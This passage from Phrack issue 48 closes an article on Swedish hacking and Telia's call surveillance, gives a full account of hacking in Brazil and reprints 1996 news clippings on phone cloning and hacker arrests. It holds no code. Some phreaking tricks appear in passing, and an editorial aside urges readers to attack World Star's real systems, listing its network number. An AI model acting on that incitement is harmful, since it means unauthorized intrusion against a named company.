  13422. of the Swedish telephone system AXE that I will write more about in a
  13423. moment.) As reported in Phrack #43 they were busted and convicted under
  13424. the new British anti-hacker law.
  13425.  
  13426. Later Swedish achievements include the phonecard emulator, constructed
  13427. by Atari ST enthusiast Marvin in 1992, after hearing the Swedish phone
  13428. company Telia boast of these prepaid phonecards superior security.
  13429. Though these silicon-based chip phonecards (256 bytes serial EPROMs)
  13430. couldn't actually be recharged or easily tampered with, he realized
  13431. there was no problem in emulating the chip with a Motorola 68c705
  13432. one-chip computer. Some fake phonecards were manufactured and sold for
  13433. almost nothing among his very best friends more on a "See, it can be
  13434. done"-basis than with any intention to defraud Telia or earn heaps of
  13435. money. Somehow the blueprints for the emulator found its way into the
  13436. Internet.
  13437.  
  13438. Swedish hackers in general have a very strong tradition of forming
  13439. groups, due to their roots in programming activities rather than
  13440. phreaking. Group awareness and culture is very widespread and accepted
  13441. within the boundaries of the whole Swedish computer underground. Thus,
  13442. LOYALTY is very strong among Swedish hackers. Most hackers who get
  13443. busted by authorities or blackmailed by companies would rather DIE than
  13444. telling the name of even a single 10-year old warez d00d.
  13445.  
  13446. While we're at it - hacker busts, and phreaker busts in particular, are
  13447. carried out in quite a disturbing manner in Sweden. To explain this I
  13448. must first explain a bit about the Swedish telephone system.
  13449.  
  13450. Almost all Swedish networks use a system similar to 4ESS, constructed in
  13451. cooperation by the State Telecom "Televerket" and Swedish
  13452. telecommunications equipment producers Ericsson Telecom. This system is
  13453. called AXE, which is an abbreviation for Automatic Cross-Connection
  13454. Equipment. AXE is used in some 100 countries all over the world and
  13455. probably one of the most beautiful exchange systems ever developed. AXE
  13456. is designed for national, metropolitan and rural networks, and the same
  13457. system nucleus is used in all the different systems. It can control both
  13458. digital and analog equipment, though it's made with the aim on
  13459. transforming all Swedish networks from analog to digital connections. It
  13460. also comes with a fully featured bureaucratic organization for
  13461. maintenance, administration and economics in general. AXE has the
  13462. capability of building virtual groups in switching-stations, thus
  13463. putting your PBX into the telco soup as well, making you believe you
  13464. have the control over it though it's actually located elsewhere.
  13465.  
  13466. In short, this is an centralized, monolithic system of the horribly
  13467. efficient type that telcos love. It tells any amateur to keep their
  13468. hands off and do something else. Of course it's a system that hackers
  13469. and phreakers hate, since it's limited to authorities. The filthy crowd
  13470. do not know what is going on inside these exchanges, and the telcos like
  13471. to keep it that way.
  13472.  
  13473. AXE also works with stored program control that resides inside the
  13474. system core of every switching station. Of course this is all software,
  13475. and of course State Telecom, upon building AXE, couldn't hold back their
  13476. Big Brother tendencies.
  13477.  
  13478. The result is that every call made from anywhere to anywhere, is logged
  13479. in a central computer. Now that's something! Not only did this equipment
  13480. wipe out every possibility to box within Sweden, but it also removed all
  13481. kind of phone privacy. In fact not only calls are logged, but ALL
  13482. activity performed at your terminal. If you lift the handset, press a
  13483. digit and hang up, time, date and the digit you pressed is registered.
  13484. All this data is stored on magnetic tapes for 6 months.
  13485.  
  13486. Now, luckily Sweden has a strong Computer Privacy Act. You just aren't
  13487. allowed to set up and use such facilities as you please, not even if you
  13488. are the State Telecom. There is even a specific authority,
  13489. "Datainspektionen" (The Computer Inspection Department) with the only
  13490. purpose of looking after and preserve citizen privacy by protecting
  13491. individuals from corporate and governmental interests. As a result State
  13492. Telecom "Televerket" (which later changed name to "Telia" as they were
  13493. transformed from an authority into a private corporation as of July 1st
  13494. 1993) were not allowed to give out any of the information gathered in
  13495. these registers to anyone else than either the calling or the receiving
  13496. party. Not even the police could have this information in case they
  13497. weren't suspecting a indictable crime resulting in at least 2 years of
  13498. prison, such as drug trading or terrorism, and you don't get that kind
  13499. of penalty for phreaking alone - at least not in Sweden.
  13500.  
  13501. But Telia could evade these restrictions. In order to successfully
  13502. phreak using PIN-codes, you have to call an operator using a Swedish
  13503. version of the 800-number: a 020-number. Telia could then claim the call
  13504. was made to the owner of that number: AT&T, MCI & Sprint mostly. (There
  13505. are of course Calling Cards in Sweden as well: "Telia Access" - neither
  13506. used nor abused by anybody.) As well as these companies have their own
  13507. intelligence agencies, so have Telia. Once eg AT&T had someone traced
  13508. for phreaking, Telia could easily produce a complete list of calls made
  13509. to AT&T operators from a certain number. Telia themselves would even use
  13510. information they weren't allowed to: they would pull out a list of ALL
  13511. outgoing calls from the phreaker in question including calls to MCI,
  13512. girlfriends, mom, dad, grandma... all logged calls.
  13513.  
  13514. Telia would then call this poor phreaker to their local Swedish office,
  13515. sticking the endless list under his/her nose, commanding: "TALK, or we
  13516. will turn you in to the authorities", carefully not to mention that all
  13517. information on the printout would be absolutely useless in court. The
  13518. only conclusive evidence would in fact be those calls traced back all
  13519. the way from America or wherever the phreaker called; in that way
  13520. rigorously documented. Naturally, the common phreaker had no legal
  13521. experience and wouldn't know about this. Instead he would talk, giving
  13522. out detailed information on his/her techniques worthy of a full-time
  13523. high-educated security consultant. After this session the phreaker was
  13524. given a bill of the calls that could indeed be proven in court. If
  13525. he/she didn't pay it - Telia (or any other operator) would end up
  13526. turning him/her to the authorities anyway. So much for cooperation.
  13527. Telia themselves would, if they felt it was necessary, go even further
  13528. than the overseas operators, systematically exposing every weakness in
  13529. the phreakers personal life, using the information in the computer log
  13530. for psychological terror.
  13531.  
  13532. This pattern of treatment of Swedish phreakers seems to be very much the
  13533. same among all telecom providers in Sweden. Lately Telia, under command
  13534. of security officer Pege Gustavsson made some noteworthy mistakes
  13535. though: in their efforts to convict as many phreakers as possible, they
  13536. called up companies receiving calls from "suspicious" individuals,
  13537. warning them about this or that person calling them over and over again.
  13538. This could only mean Telia was also systematically monitoring some
  13539. Swedish hackers and had formed some security group to carry out this
  13540. probation. Normally this should have been kept quiet, as Telia are
  13541. absolutely not allowed to form their own abuse police forces, but at
  13542. some instance they happened to call up a security company using
  13543. phreakers as informants. Of course this security company didn't like the
  13544. idea of having "their" phreakers traced around, and the matter was
  13545. brought to public attention. Many independent sources agreed that Telia
  13546. had violated the Swedish Computer Act, and hopefully this brought an end
  13547. to this wild tracing. You shouldn't be too sure though, since Telia
  13548. themselves never confessed of doing anything illegal.
  13549.  
  13550. As you might have understood the Computer Act is quite an important
  13551. factor in all legal discussions concerning Swedish hacking. This Act
  13552. came out as a result of general attention focused upon the computers vs.
  13553. privacy matter in 1973. As Sweden was one of the first countries to make
  13554. use of computers in governmental administration, and as Swedish
  13555. authorities were eager to register every possible piece of information,
  13556. some politically influential individuals started a debate resulting in
  13557. the founding of the Computer Act and the Computer Inspection Department.
  13558. As a result Sweden is light years ahead of most countries when it comes
  13559. to privacy matters. For example there is no problem in having the number
  13560. identification possibilities on your line deactivated for good, and it
  13561. won't cost you anything. You can also easily obtain free printouts from
  13562. any computer register containing information on you, including the
  13563. register at your local AXE-exchange.
  13564.  
  13565. To sum this article up I can draw the conclusion that even Sweden has
  13566. had its handful of bright hackers, each category bringing their straw to
  13567. the stack. Even though Swedish officials and companies would hardly
  13568. admit it, these hackers have obviously been very important for this
  13569. country, at least in forcing system managers, security officials,
  13570. software producers, policemen, politicians and so on to think things
  13571. over. Sweden has also attracted outside attention in some cases, and
  13572. will probably keep doing so. If you should pin- point one group that has
  13573. meant more to the Swedish scene than any other, it wouldn't be any of
  13574. the H/P groups, but rather the cracking pioneers Fairlight - a well
  13575. organized and world-famous warez producer.
  13576.  
  13577. Linus Walleij aka King Fisher / Triad
  13578. triad@df.lth.se
  13579.  
  13580. (Some handles have been changed to protect retired Swedish hackers from
  13581. luser mail.)
  13582.  
  13583. Swedish readers may be interested in the fact that I'm currently writing
  13584. a lengthy text in Swedish (a book actually) providing a closer look at
  13585. Swedish hacking history, which will be released on hypertext and ASCII
  13586. sometime later this year. Over and out from Sweden!
  13587.  
  13588. ---------------------------------------------------------------------------
  13589.  
  13590.                            HACKING IN BRAZIL
  13591.                            =================
  13592.  
  13593. Before talking about hacking here, it's good to describe the conditions
  13594. of living. Right now, the country is a mix of Belgium and India. It's
  13595. possible to find both standards of living without travelling long
  13596. distances. The Southern part of the country concentrate most of the
  13597. industry, while in the west one can find Amazonia jungle. There are many
  13598. Brazils, one could say.
  13599.  
  13600.         Beginning with the hacking and phreaking.
  13601.  
  13602. Hackers and computers enthusiasts have several different places for
  13603. meeting. When this thing started, by the time of that film "Wargames",
  13604. the real place  to meet hackers and  make contacts were the computer
  13605. shops, game-arcades and "Video-texto" terminals. The computer shops were
  13606. a meeting place because many of those "hackers" had no computers of
  13607. their own and the shop-owners  would let them play with them as part of
  13608. a advertising tool to  encourage people buying it for their kids.
  13609.  
  13610. Today that is no longer needed, since prices dropped down and people
  13611. make a team already at schools or sometimes just join a BBS (most people
  13612. who buy a modem, end up thinking about setting up a BBS). By the way,
  13613. most schools are advertising computer training as part of  their
  13614. curricula, to charge more, and like everywhere, I guess, people no
  13615. longer learn typewriting, but computer-writing, and many brazilian
  13616. newspapers dedicate a section on computer knowledge once a week, with
  13617. advertising, hints, general info and even lists of BBS's.
  13618.  
  13619. A few years ago, the "Video-texto" terminals were also big meeting
  13620. places. That was part of  a effort to make popular the use of a
  13621. computer linked by modem to  get services like msx-games, info on
  13622. weather, check bank account and so on. Just like the Net,  one could do
  13623. e-mail, by some fancy tricks and other  things that could be  called
  13624. hacking. The difference was that it was made by the state-owned
  13625. telephone company and each time the trick was too well know, it was
  13626. changed. The only way to keep in touch was keeping in touch with the
  13627. people who used the system like hell. It's no different than what it
  13628. happens with the computer gurus. The protocol used for that, X-25 is the
  13629. same used for the banking money transfers, but don't think it was
  13630. possible to do anything more than checking how much money one had and a
  13631. few other classified data. People who used that at home (not too many,
  13632. since the company didn't think it would be such a hit, and didn't
  13633. provide for it) could spend their fathers money discovering funny things
  13634. about the system, like messing with other people's phones and so.  One
  13635. could also  use the terminals at the Shopping Centers to make phone
  13636. calls to their friends without paying. The guy at the other end would be
  13637. heard by the small speaker.
  13638.  
  13639. Phreaking here in Brazil is something secret. Apart from the trick
  13640. described in the section "Letters to read by" at the summer 1994 of the
  13641. 2600 Magazine, where one would call through locked rotatory telephone,
  13642. little is known about phreaking. One thing is that people who enrolled
  13643. in Telecommunications Engineering could call Europe and USA with ease,
  13644. but they would not tell you how. It must be said that all public phones
  13645. have metal cables  around the cables and that the phone machines are
  13646. quite tough to break down. I guess it wasn't for beauty.
  13647.  
  13648. The phones use some sort of metal coins called fichas, which must be
  13649. bought somewhere. The trick is to use a coin with a string, so it would
  13650. not be collected. But if the police caught... The police doesn't follow
  13651. rules about that. Either they put a fine on the guy for that, or arrest
  13652. him for vandalism or anything else they think of at the moment. It is
  13653. hassle, anyway. My friend who was doing electrical Engineering told me
  13654. that boxing in Brazil was impossible. The system is just not good enough
  13655. to be boxed. Another friend of mine told me that in the Northeast part,
  13656. where people are a little bit different and more easy-going, the phone
  13657. system can be boxed, because some top-brass asked the company to let
  13658. that  feature implemented. The Phone company doesn't admit any knowledge
  13659. about that.
  13660.  
  13661. Internet access is something quite hard to get today. Until a few weeks
  13662. ago, the system would not let the creation of a Internet site that was
  13663. not part of some research project. So, only Universities and like were
  13664. capable of putting people in the Net Universe. In the University of Sco
  13665. Paulo, people in the post-graduation courses could get it with ease, but
  13666. graduating students would have to show some connection to a research
  13667. project. That in theory, because the students found out that one could
  13668. use the IBM CDC 4360 to telnet without a Internet account. Also, all the
  13669. faculties that had computer rooms full of AT 386 which where linked by
  13670. fiber optics to this computer.  Another one did the file transfers
  13671. between the accounts and the computer at the computer rooms  and that
  13672. ftp was also possible without an account, but only to a few sites, like
  13673. oakland and so. That lasted for about a year, until that thing was
  13674. fixed in the router, but only at the Politechnik School. Says the legend
  13675. that the guys were downloading too much GIF and JPG pictures of Top
  13676. Models from a ftp site nearby. That spent so much bandwidth that the
  13677. site started to complain and both things happened: the site stopped to
  13678. store GIF's of wonderful women in swimsuit and the router was fixed to
  13679. prevent ftp without a Internet account. One can still today connect the
  13680. outside world via telnet and many people have accounts in Internet BBS
  13681. like Isca BBS, Cleveland Freenet and like. The Bad Boy BBS was "in",
  13682. until  it went out of business. This kind of access is not good, though,
  13683. for it is very slow, sometimes. Also, it is hard to  download something
  13684. bigger than 60 kbyte.  The way I devised, downloading the file inside
  13685. the bbs and uuencoding it. This way you could list the file and capture
  13686. the screen listing, uudecode it after some editing and have a working
  13687. .exe or .zip file.
  13688.  
  13689. By these means one could, inside the Campus, do all downloading one
  13690. wanted,  from anywhere in the world. Outside the campus, it is  possible
  13691. to do it by phone lines, but: the Modem will not go faster than 2400
  13692. without character correction  (no Zmodem at all). Which makes quite hard
  13693. to download compressed files. One could  an account:  that  would be
  13694. possible by these means, but the amount of trash during the phone
  13695. connection would make it real hard to type in passwords and like. To try
  13696. doing any kind of  thin g but reading letters by modem is some kind of
  13697. torture. The real thing is to do it by "linha dedicada", a special line
  13698. for computer transmission. It's much more expensive though, but if you
  13699. have the money to spend with that...
  13700.  
  13701. Perhaps the best way to get access to an Internet account though is to
  13702. be part of the research project "Escola do Futuro" that among other
  13703. things get schools linked by the Net. That's what I did and they pay me
  13704. quite well to search for data in the Net, for  the students of those
  13705. schools. The University of Campinas is said to give all students a
  13706. Internet account regardless of knowledge of what-it-is, as soon as the
  13707. guy(girl) gets in. Of course here there's BITNET also. That's doomed for
  13708. extinction, but this or  that reason keeps people from closing it down.
  13709. Most teachers use it, guess there's even some post-graduation work
  13710. written about that. It's easier to access via modem, also. Old habits
  13711. die hard.
  13712.  
  13713. Outside the Campus, for common people, there are few opportunities. The
  13714. only thing you can get, at least until the opening of commercial
  13715. internet sites, something about to happen one of these days, is access
  13716. by mail. You join one BBS with Internet access, and your mail is sent by
  13717. a Internet account later during the  day. This is not a direct access,
  13718. as one can see,  but it's a easy way to access by modem. Problem is that
  13719. you have to pay if you use it too much. The BBS's that do it don't do it
  13720. for free, also. Connection to the Compuserve is also possible, but it
  13721. also costs a lot of money, for my point of view.
  13722.  
  13723. Because of the newspapers, the knowledge about Internet is spreading
  13724. fast and the number of sites is growing the same way everywhere else in
  13725. the world. Even the military people are starting with it. There are plan
  13726. s to enhance it and make better connections, and some informative
  13727. material is being translated in Portuguese, like "Zen and the Art of
  13728. Internet" and made available in the gopher.rnp.br. There are many
  13729. mirrors from many famous sites, like Simtel20 and at least one Internet
  13730. BBS, the "Jacare BBS" (Alligator bbs, available by telnetting
  13731. bbs.secom.ufpa.br - 192.147.210.1 - login bbs. World Wide Web sites are
  13732. becoming sort of popular also, but still available only to a few people
  13733. who are lucky enough to get the access. Brazilian hackers are not very
  13734. fond  of sharing the knowledge of how to get access and other things,
  13735. sometimes because of fear of losing it, sometimes because the greed of
  13736. it would overcharge the system. There's no hacker magazine here, yet,
  13737. and very few people confess their curiosity about hacking for knowledge
  13738. for fear of not finding jobs. Anyway most would-be hackers either get a
  13739. job and stop hacking for fun or keep their activities secret in order to
  13740. pursue their objectives.
  13741.  
  13742. Today, Brazilian Hacker Underground did change a little. Lots of
  13743. magazines, dealing only with Internet Issues, are being published. There
  13744. is a hacker zine, the now famous "Barata Eletrica". This and the hacker
  13745. list I created is starting to unite the computer rats, here. But I had
  13746. to stop hacking in order to write the e-zine. Too famous to do that.
  13747. Another guy just started the thing. He did not learn with my mistake and
  13748. is signing it with his name, also. Received lots of letters, even as far
  13749. as Mozambique, praising the material, which is very soft, for fear of
  13750. losing my net access. Twice my account was "freezed". The people at my
  13751. site are paranoid. Suffered too much from break-ins already. Most BBS's
  13752. are trying to turn themselves in Internet providers or else, to get
  13753. e-mail access. There was a fear the State would control the thing, like
  13754. they did with the Phone system. Can any of you guys imagine what it is,
  13755. to pay 4.000 US$ dollars for a phone line? In the City of Sao Paulo,
  13756. (look like L.A., one can say), that's the average price. Cellular is
  13757. cheaper. Motorola rules. The public phone system was changed again. No
  13758. more "fichas". At least for long distance calls. It's a small card that
  13759. looks like plastic one side and magnetic material in the other. m still
  13760. trying to do 2600 meetings. Oh, once in a while, there is a break-in
  13761. here and there, and a hacker is interviewed in TV, but people are only
  13762. now making the difference between the good guys (hackers) and the  bad
  13763. guys (crackers). With Win95, people are losing fear of exchanging
  13764. virus-sources files. The lack of philes in Portuguese makes it dificult
  13765. for people to learn about hacking. People who know about it, don't have
  13766. enough time to write. I started to unite some guys to do a translation
  13767. of "hacker crackdown", but that's another story. I shortened the name of
  13768. the book to "crack.gz". Guess what's happened? My account is blocked up
  13769. to this day. They told me I'll get my access back. One of these days.
  13770. One of these days I'll re-write this article, and tell the whole thing
  13771. in detail.
  13772.  
  13773. Any Portuguese speaker that does not know about my e-zine,
  13774. try a ftp.eff.org mirror. The URL:
  13775. ftp://ftp.eff.org/pub/Publications/CuD/Barata_Eletrica
  13776.  
  13777.                               ==Phrack Magazine==
  13778.  
  13779.                  Volume Seven, Issue Forty-Eight, File 18 of 18
  13780.  
  13781.               PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN
  13782.               PWN                                             PWN
  13783.               PWN              Phrack World News              PWN
  13784.               PWN                                             PWN
  13785.               PWN        Compiled by Datastream Cowboy        PWN
  13786.               PWN                                             PWN
  13787.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  13788.  
  13789.  
  13790.  
  13791. Security Software Thwarts Hackers                               July 23, 1996
  13792. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  13793. (PRNewswire)
  13794.  
  13795. World Star Holdings, Ltd. announced today that there have been approximately
  13796. 5,000 unsuccessful attempts to break its proprietary VPAGE Internet security
  13797. system.  In order to further demonstrate the functionality of its technology,
  13798. they Company has unveiled a new addition to the World Star Internet security
  13799. challenge:  "The World Star Cyberhospital."
  13800.  
  13801. The company recently launched an online contest offering more than $50,000 in
  13802. cash and prizes to the first person to break its security.
  13803.  
  13804. [ THESE CHALLENGES ARE UNADULTERATED BULLSHIT.  Phrack suggests you test
  13805.   something other than the fake, non-production demo contest system.  How
  13806.   well does their software hold up in a real business environment?
  13807.   (in other words:  THEIRS!?!!@$)
  13808.  
  13809.      World Star Holdings (NET-WORLDSTAR-MB-CA)
  13810.      165 Garry Street
  13811.      Winnipeg, Manitoba R3C 1G7
  13812.      CA
  13813.  
  13814.      Netname: WORLDSTAR-MB-CA
  13815.      Netnumber: 205.200.247.0 ]
  13816.  
  13817. -----------------------------------------------------------------------------
  13818.  
  13819. Your Cellular Phone Number May Be Up For Grabs                August 21, 1996
  13820. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  13821. by Mimi Whitefield (Miami Herald)
  13822.  
  13823.  
  13824. Electronic bandits have snatched cellular phone numbers from the airwaves and
  13825. cloned phones used by the Miami office of the Secret Service.
  13826.  
  13827. BellSouth Florida president Joe Lacher's phone has been cloned; Spero Canton,
  13828. spokesman for BellSouth, has been a victim three times over.
  13829.  
  13830. "The bums never sleep.  They're everywhere," complained Bill Oberlink,
  13831. regional president for AT&T Wireless Services.
  13832.  
  13833. But the good news is that law enforcement agencies and cellular companies
  13834. themselves are fighting back with a new arsenal of tools, technology and laws
  13835. that make it easier to detect and prosecute cellular bandits.
  13836.  
  13837. -----------------------------------------------------------------------------
  13838.  
  13839. Miami Fraud Squad Pursues Cellular Bandits                    August 12, 1996
  13840. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  13841. by Audra D.S. Burch (Miami Herald)
  13842.  
  13843. How's this for capitalism gone awry:  Metro-Dade police nabbed a cellular
  13844. bandit who was selling a $150 package deal -- $75 each for a stolen phone
  13845. and number -- along with a 30-day guarantee on unlimited illegal air time.
  13846.  
  13847. In a sting operation, police took him on the cut-rate offer.
  13848.  
  13849. Thanks to the work of a special Metro-Dade Police Economic Crimes Bureau, the
  13850. entrepreneurial cloner got a prison sentence.
  13851.  
  13852. -----------------------------------------------------------------------------
  13853.  
  13854. Newer Technology Aids Fight Against Cellular Fraud            August 21, 1996
  13855. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  13856. by Mimi Whitefield (Miami Herald)
  13857.  
  13858. New technology is on the side of cellular companies fighting telecom criminals
  13859. who can rack up thousands of dollars in illegal charges before a consumer even
  13860. knows he's been hit.
  13861.  
  13862. New Jersey-based Bellcore, for example, has developed NetMavin software,
  13863. which can detect fraudulent or unusual calling patterns within half an hour.
  13864.  
  13865. "This is really going to screw the cloners up," said Roseanna DeMaria, an
  13866. AT&T Wireless executive.
  13867.  
  13868. -----------------------------------------------------------------------------
  13869.  
  13870. SPA Files Copyright Suit                                        July 28, 1996
  13871. ~~~~~~~~~~~~~~~~~~~~~~~~
  13872. (Reuters News)
  13873.  
  13874. The Software Publishers Association said Sunday it filed a civil copyright
  13875. infringement lawsuit against a Seattle man for illegal distribution of
  13876. software on the Internet.
  13877.  
  13878. The suit, which was filed July 23 in the U.S. District Court in Seattle,
  13879. alleges that Max Butler illegally uploaded copyrighted software to a file
  13880. transfer protocol site for distribution across the Internet, the trade
  13881. association said.
  13882.  
  13883. "This action is a warning to Internet users who believe they can infringe
  13884. software copyrights without fear of exposure or penalty," said Sandra
  13885. Sellers, Software Publisher's vice president of intellectual property
  13886. education and enforcement.
  13887.  
  13888. -----------------------------------------------------------------------------
  13889.  
  13890. The L0pht                                                        August, 1996
  13891. ~~~~~~~~~
  13892. by Steve G. Steinberg (Wired) p. 40
  13893.  
  13894. What do a group of hackers do when the equipment they've accumulated over
  13895. years of dumpster diving no longer fits in their apartments?  They get
  13896. a l0pht.  Since 1993, a core group of seven Boston-based hackers have rented
  13897. a loft space for hacking, trading information about cellular phones security,
  13898. and building things like a wireless Internet service using discarded
  13899. microwave equipment.
  13900.  
  13901. Now that all of them have day jobs in the industry, why do they keep at it?
  13902. "For the girls and the text files, of course," says Mudge.
  13903.  
  13904. [ HELL YES!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ]
  13905.  
  13906. -----------------------------------------------------------------------------
  13907.  
  13908. Cracking Down on the Outlaws of Cyberspace                       July 2, 1996
  13909. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  13910. by M.J. Zuckerman (USA Today) p. 4B
  13911.  
  13912.  
  13913. What's it take to be America's top cybercop?
  13914.  
  13915. "I was a hockey referee, so I'm used to being beaten up," suggests Jim
  13916. Christy, who is among those most often mentioned for the title.  And he's
  13917. been at it for only a decade.
  13918.  
  13919. Today, with the weighty title of Chief of Computer Crime Investigations
  13920. and Information Warfare, he is one of 68 computer investigators in the
  13921. Air Force Office of Special Investigations (OSI).
  13922.  
  13923. Christy, a Baltimore native, stumbled into the computer field.  After
  13924. drawing No. 35 in the draft lottery during the Vietnam War, he joined the
  13925. Air Force rather than waiting to be drafted.  He spent the next four years
  13926. as a computer key punch operator, followed by 13 years as a civilian working
  13927. computers at the Pentagon.
  13928.  
  13929. When he moved to OSI, Christy largely ceased his hands-on involvement with
  13930. computers and systems.
  13931.  
  13932. Since last fall, Christy has been on temporary assignment to the Senate
  13933. Permanent Subcommittee on Investigations, helping them examine security
  13934. in cyberspace.
  13935.  
  13936. "I like working up on Capitol Hill, because you can make a difference,"
  13937. Christy says.
  13938.  
  13939. -----------------------------------------------------------------------------
  13940.  
  13941.  
  13942. Hackers Penetrate Justice Department Home Page                August 18, 1996
  13943. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  13944. (AP News Wire)
  13945.  
  13946. Internet hackers infiltrated the Justice Department's home page
  13947. yesterday, altering the official web site to include swasticas,
  13948. obscene pictures and lots of criticism of the Communications Decency Act.
  13949.  
  13950. The official web site, which was turned off by government technicians
  13951. when it was discovered, was changed to read "United States Department of
  13952. Injustice," next to a red, black and white flag bearing a swastika.
  13953.  
  13954. The page included color pictures of George Washington, Adolf Hitler, and a
  13955. topless Jennifer Aniston.
  13956.  
  13957. [ A link to a copy of the page is it http://www.fc.net/phrack/doj ]
  13958.  
  13959. -----------------------------------------------------------------------------
  13960.  
  13961. Employment Prospect Grim for Hacker                           August 19, 1996
  13962. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  13963. (AP News wire)
  13964.  
  13965.  
  13966. Employment prospects are grim for Kevin Lee Poulsen, a computer whiz
  13967. imprisoned five years for his cyberspace havoc.
  13968.  
  13969. The 30-year-old hacker has been barred from getting near a computer for the
  13970. next three years and he now fears selling cowboy boots at a Western store
  13971. will be his only opportunity to make some money.
  13972.  
  13973. "It's the only place where I've been greeted with a positive attitude," he
  13974. said during an interview last week.  "I can't get a job that I am qualified
  13975. for, basically."
  13976.  
  13977. On September 3, he goes to federal court in hopes of having some of the
  13978. computer restrictions relaxed.
  13979.  
  13980. -----------------------------------------------------------------------------
  13981.  
  13982. School Hires Student To Hack Into Computers                   August 22, 1996
  13983. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  13984. (The Sun Herald)
  13985.  
  13986. Students at Palisades Park's high school needed their transcripts to
  13987. send off to colleges.  But they were in the computer and no one who knew
  13988. the password could be reached.  So the school hired a 16-year-old hacker
  13989. to break in.
  13990.  
  13991. Superintendent George Fasciano was forced to explain to the School
  13992. Board on Monday the $875 bill for the services of Matthew Fielder.
  13993.  
  13994. -----------------------------------------------------------------------------
  13995.  
  13996. Feds aim low on hacker crackdown                                June 21, 1996
  13997. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  13998. by Lewis Z. Koch (Upside Online News)
  13999.  
  14000. Nineteen-year-old Christopher Schanot of St. Louis, Mo. has been
  14001. languishing in a Federal jail since March 25, 1996, charged with four
  14002. counts of computer hacking. He is not allowed to post bond, because
  14003. Federal authorities contend he is "a computer genius intent on
  14004. infiltrating computer systems of some of the largest companies and
  14005. entities in the country," and because a jailhouse snitch claims Schanot
  14006. bragged he would run away if he were released. He has never been charged
  14007. with a crime or arrested before. 
  14008.  
  14009. Schanot's problems began after he ran away from home on May 30, 1995,
  14010. taking some of his disks, a hard drive and personal items. According to a
  14011. knowledgeable source close to Schanot, Chris felt his parents, especially
  14012. his father Michael, didn't understand or respect him. 
  14013.  
  14014. Less rocky, it seems, was his relationship with Netta Gilboa, a
  14015. 38-year-old woman living near Philadelphia. Gilboa is editor-in-chief and
  14016. publisher of _Gray Areas_, a slick, text-heavy, irregular magazine that
  14017. explores the "grey areas" of "alternative lifestyles and deviant
  14018. subcultures." 
  14019.  
  14020. -----------------------------------------------------------------------------
  14021.  
  14022. City of London Surrenders To Cyber Gangs                         June 2, 1996
  14023. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  14024. (Times of London)
  14025.  
  14026. City of London financial institutions have paid huge sums to international
  14027. gangs of sophisticated "cyber terrorists" who have amassed up to 400 million
  14028. pounds worldwide by threatening to wipe out computer systems.
  14029.  
  14030. A Sunday Times Insight investigation has established that British and 
  14031. American agencies are examining more than 40 "attacks" on financial 
  14032. institutions in London and New York since 1993.
  14033.  
  14034. Victims have paid up to 13 million pounds a time after the blackmailers 
  14035. demonstrated their ability to bring trading to a halt using advanced 
  14036. "information warfare" techniques learnt from the military.
  14037.  
  14038. According to the American National Security Agency (NSA), they have 
  14039. penetrated computer systems using "logic bombs" (coded devices that can 
  14040. be remotely detonated), electromagnetic pulses and "high emission radio 
  14041. frequency guns," which blow a devastating electronic "wind" through a 
  14042. computer system.
  14043.  
  14044. The gangs are believed to have gained expertise in information warfare 
  14045. techniques from the American military, which is developing "weapons" 
  14046. that can disable or destroy computer hardware. Some are also known to 
  14047. have infiltrated banks simply by placing saboteurs on their payroll as 
  14048. temporary staff.
  14049.  
  14050. -----------------------------------------------------------------------------
  14051.  
  14052. Credit Fraud on AOL
  14053. ~~~~~~~~~~~~~~~~~~~
  14054. (AP Newswire)
  14055.  
  14056. Two boys posed as billing representatives for an online service and stole
  14057. at least 15 credit card numbers, and used those numbers to buy $15,000
  14058. worth of merchandise, from computer equipment to cymbals, police said.
  14059.  
  14060. The two 16-year-olds were charged with 39 counts of possession of
  14061. stolen property, theft and attempted fraud. They were released to the
  14062. custody of their parents pending a Family Court hearing.
  14063.  
  14064. Police believe the boys obtained a program designed by computer
  14065. hackers to flimflam customers of America Online.  It sends a message to
  14066. users saying they will be cut off if they don't type in their name,
  14067. credit card account number and computer service password.
  14068.  
  14069. -----------------------------------------------------------------------------
  14070.  
  14071. FBI Survey Reveals Growth of Cybercrime                           May 6, 1996
  14072. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  14073. by Rory J. O'Connor (San Jose Mercury News)
  14074.  
  14075. Intruders are breaking into the nation's computer systems at an
  14076. increasing rate and often with more nefarious motives than in the
  14077. past, according to a survey co-sponsored by the FBI and a private
  14078. group of computer security professionals.
  14079.  
  14080. "What this shows is that the ante has been upped in cyberspace," said
  14081. Richard Power, senior analyst of the Computer Security Institute in
  14082. San Francisco, which conducted the survey. "As all manner of commerce
  14083. moves into cyberspace, all manner of crime is moving there as well.
  14084. It's no longer just vandalism."
  14085.  
  14086. More than 40 percent of the 428 corporate, university and government
  14087. sites that responded to the FBI survey reported at least one
  14088. unauthorized use of their computers within the last 12 months, with
  14089. some institutions reporting as many as 1,000 attacks in the period.
  14090.  
  14091. It also appears that there's more computer crime for hire occurring,
  14092. Power said, exploiting mainly older hackers who have graduated to
  14093. making money off the skill they once used simply to establish bragging
  14094. rights with their peers. He suggested that some of the hiring is being
  14095. done by intelligence services of various governments, although he
  14096. offered no proof.
  14097.  
  14098. -----------------------------------------------------------------------------
  14099.  
  14100. University hacker to be hunted on the Internet                 April 27, 1996
  14101. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  14102. By Robert Uhlig (London Daily Telegraph)
  14103.  
  14104. Computer experts at Cambridge University are using the Internet to hunt
  14105. for a hacker who breached their security systems to access some of the
  14106. world's most sensitive research information. 
